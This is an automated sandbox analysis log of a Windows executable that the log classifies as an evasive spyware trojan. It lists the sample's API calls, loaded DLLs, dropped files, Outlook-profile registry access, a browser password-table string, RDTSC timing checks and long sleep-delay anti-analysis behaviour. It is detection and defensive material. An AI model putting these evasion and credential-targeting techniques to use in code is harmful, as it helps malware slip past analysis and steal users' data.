            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376070705_2_37607070
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376018585_2_37601858
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376048205_2_37604820
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_376048105_2_37604810
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_37A3E7905_2_37A3E790
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_37A3D6085_2_37A3D608
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_37A383285_2_37A38328
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: String function: 00402C41 appears 51 times
            Source: v4nrZtP7K2.exe, 00000001.00000002.2033951747.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs v4nrZtP7K2.exe
            Source: v4nrZtP7K2.exe, 00000005.00000000.2032112145.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs v4nrZtP7K2.exe
            Source: v4nrZtP7K2.exe, 00000005.00000002.2943570464.00000000346E7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs v4nrZtP7K2.exe
            Source: v4nrZtP7K2.exeBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs v4nrZtP7K2.exe
            Source: v4nrZtP7K2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 1_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_004034A5
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_004034A5
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 1_2_00404850 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_00404850
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 1_2_00402104 CoCreateInstance,1_2_00402104
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeFile created: C:\Users\user\AppData\Local\IwJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeMutant created: NULL
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeFile created: C:\Users\user\AppData\Local\Temp\nswBD82.tmpJump to behavior
            Source: v4nrZtP7K2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: v4nrZtP7K2.exe, 00000005.00000002.2946031488.000000003584D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: v4nrZtP7K2.exeReversingLabs: Detection: 63%
            Source: v4nrZtP7K2.exeVirustotal: Detection: 77%
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeFile read: C:\Users\user\Desktop\v4nrZtP7K2.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\v4nrZtP7K2.exe "C:\Users\user\Desktop\v4nrZtP7K2.exe"
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess created: C:\Users\user\Desktop\v4nrZtP7K2.exe "C:\Users\user\Desktop\v4nrZtP7K2.exe"
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess created: C:\Users\user\Desktop\v4nrZtP7K2.exe "C:\Users\user\Desktop\v4nrZtP7K2.exe"Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: v4nrZtP7K2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000001.00000002.2034874444.0000000003C88000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 1_2_6FFB1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_6FFB1B5F
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeFile created: C:\Users\user\AppData\Local\Temp\nsrBE9D.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeAPI/Special instruction interceptor: Address: 4025D5D
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeAPI/Special instruction interceptor: Address: 25C5D5D
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeRDTSC instruction interceptor: First address: 3FE8141 second address: 3FE8141 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FDDF9108161h 0x00000006 cmp bh, dh 0x00000008 push edx 0x00000009 mov edx, 00000016h 0x0000000e cmp edx, 1DF9774Eh 0x00000014 jg 00007FDDF9146722h 0x0000001a pop edx 0x0000001b inc ebp 0x0000001c cmp al, bl 0x0000001e inc ebx 0x0000001f cmp bl, dl 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeRDTSC instruction interceptor: First address: 2588141 second address: 2588141 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FDDF8B85E11h 0x00000006 cmp bh, dh 0x00000008 push edx 0x00000009 mov edx, 00000016h 0x0000000e cmp edx, 1DF9774Eh 0x00000014 jg 00007FDDF8BC43D2h 0x0000001a pop edx 0x0000001b inc ebp 0x0000001c cmp al, bl 0x0000001e inc ebx 0x0000001f cmp bl, dl 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeMemory allocated: D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeMemory allocated: 34820000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeMemory allocated: 34530000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 598976Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 598828Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 598717Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 598609Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 598500Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 598390Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 598281Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 598165Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 598046Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 597937Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 597828Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 597718Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 597609Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 597499Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 597390Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 597281Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 597171Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 597062Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 596952Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 596843Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 596734Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 596625Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 596513Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 596390Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 596171Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 595840Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 595718Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 595609Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 595499Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 595375Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 595265Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 595152Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 595045Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 594921Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 594811Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 594687Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 594578Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 594468Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 594359Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeWindow / User API: threadDelayed 7040Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeWindow / User API: threadDelayed 2768Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsrBE9D.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeAPI coverage: 3.3 %
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep count: 33 > 30Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -30437127721620741s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4984Thread sleep count: 7040 > 30Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4984Thread sleep count: 2768 > 30Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -599671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -599343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -599234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -599125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -598976s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -598828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -598717s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -598609s >= -30000sJump to behavior
